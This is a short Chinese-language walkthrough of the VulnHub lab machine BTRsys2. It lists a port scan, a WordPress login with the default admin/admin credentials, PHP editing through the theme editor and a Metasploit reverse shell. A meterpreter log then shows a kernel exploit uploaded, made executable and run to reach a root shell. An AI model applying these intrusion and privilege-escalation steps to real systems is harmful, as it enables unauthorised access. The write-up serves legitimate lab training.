VulnHub靶機(jī)滲透之BTRsys2

1.信息收集 發(fā)現(xiàn)主機(jī)IP為192.168.65.132

2.nmap端口掃描nmap -T4 -A -v 192.168.65.132

3.訪問(wèn)80端口 進(jìn)行目錄掃描

4.訪問(wèn)robots.txt 發(fā)現(xiàn)wordlist

5.login處嘗試弱密碼登陸 登陸成功（username=admin passwd=admin）

image-20210309233542575.png

image-20210309233553818.png

6.Posts處發(fā)現(xiàn)文件上傳 上傳失敗

7.appearance處發(fā)現(xiàn)editor 可編輯PHP

8.msf反彈shell

9.1 查看當(dāng)前系統(tǒng)信息

9.2查找內(nèi)核漏洞

meterpreter > upload /home/kali/Desktop/exploit
[*] uploading  : /home/kali/Desktop/exploit -> exploit
[*] Uploaded -1.00 B of 23.22 KiB (-0.0%): /home/kali/Desktop/exploit -> exploit
[*] uploaded   : /home/kali/Desktop/exploit -> exploit
meterpreter > shell
Process 1286 created.
Channel 3 created.
pwd
/var/www/html/wordpress/wp-content/themes/twentyfourteen
ls -lh
total 832K
-rwxrwxrwx 1 btrisk       1000 1.1K Mar  9 08:40 404.php
-rw-r--r-- 1 www-data www-data  17K Mar  9 08:49 41458.c 
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 archive.php
-rwxrwxrwx 1 btrisk       1000 1.9K Oct 12  2016 author.php
-rwxrwxrwx 1 btrisk       1000 1.5K Oct 12  2016 category.php
-rwxrwxrwx 1 btrisk       1000 2.3K Oct 12  2016 comments.php
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-aside.php
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-audio.php
-rwxrwxrwx 1 btrisk       1000 1.1K Oct 12  2016 content-featured-post.php
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-gallery.php
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-image.php
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-link.php
-rwxrwxrwx 1 btrisk       1000  961 Oct 12  2016 content-none.php
-rwxrwxrwx 1 btrisk       1000  871 Oct 12  2016 content-page.php
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-quote.php
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-video.php
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content.php
drwxrwxrwx 2 btrisk       1000 4.0K Apr 24  2017 css
-rw-r--r-- 1 www-data www-data  24K Mar  9 08:59 exploit
-rwxrwxrwx 1 btrisk       1000  946 Oct 12  2016 featured-content.php
-rwxrwxrwx 1 btrisk       1000  728 Oct 12  2016 footer.php
-rwxrwxrwx 1 btrisk       1000  16K Oct 12  2016 functions.php
drwxrwxrwx 3 btrisk       1000 4.0K Apr 24  2017 genericons
-rwxrwxrwx 1 btrisk       1000 2.3K Oct 12  2016 header.php
-rwxrwxrwx 1 btrisk       1000 2.6K Oct 12  2016 image.php
drwxrwxrwx 2 btrisk       1000 4.0K Apr 24  2017 images
drwxrwxrwx 2 btrisk       1000 4.0K Apr 24  2017 inc
-rwxrwxrwx 1 btrisk       1000 1.6K Oct 12  2016 index.php
drwxrwxrwx 2 btrisk       1000 4.0K Apr 24  2017 js
drwxrwxrwx 2 btrisk       1000 4.0K Apr 24  2017 languages
drwxrwxrwx 2 btrisk       1000 4.0K Apr 28  2017 page-templates
-rwxrwxrwx 1 btrisk       1000 1.2K Oct 12  2016 page.php
-rwxrwxrwx 1 btrisk       1000  16K Oct 12  2016 rtl.css
-rwxrwxrwx 1 btrisk       1000 603K Oct 12  2016 screenshot.png
-rwxrwxrwx 1 btrisk       1000 1.3K Oct 12  2016 search.php
-rwxrwxrwx 1 btrisk       1000  340 Oct 12  2016 sidebar-content.php
-rwxrwxrwx 1 btrisk       1000  395 Oct 12  2016 sidebar-footer.php
-rwxrwxrwx 1 btrisk       1000  848 Oct 12  2016 sidebar.php
-rwxrwxrwx 1 btrisk       1000 1.1K Oct 12  2016 single.php
-rwxrwxrwx 1 btrisk       1000 5.6K Mar  7 21:36 style.css
-rwxrwxrwx 1 btrisk       1000 1.6K Oct 12  2016 tag.php
-rwxrwxrwx 1 btrisk       1000 2.4K Oct 12  2016 taxonomy-post_format.php
chmod 777 exp*
./exp*
bash: cannot set terminal process group (840): Inappropriate ioctl for device
bash: no job control in this shell
root@ubuntu:/var/www/html/wordpress/wp-content/themes/twentyfourteen#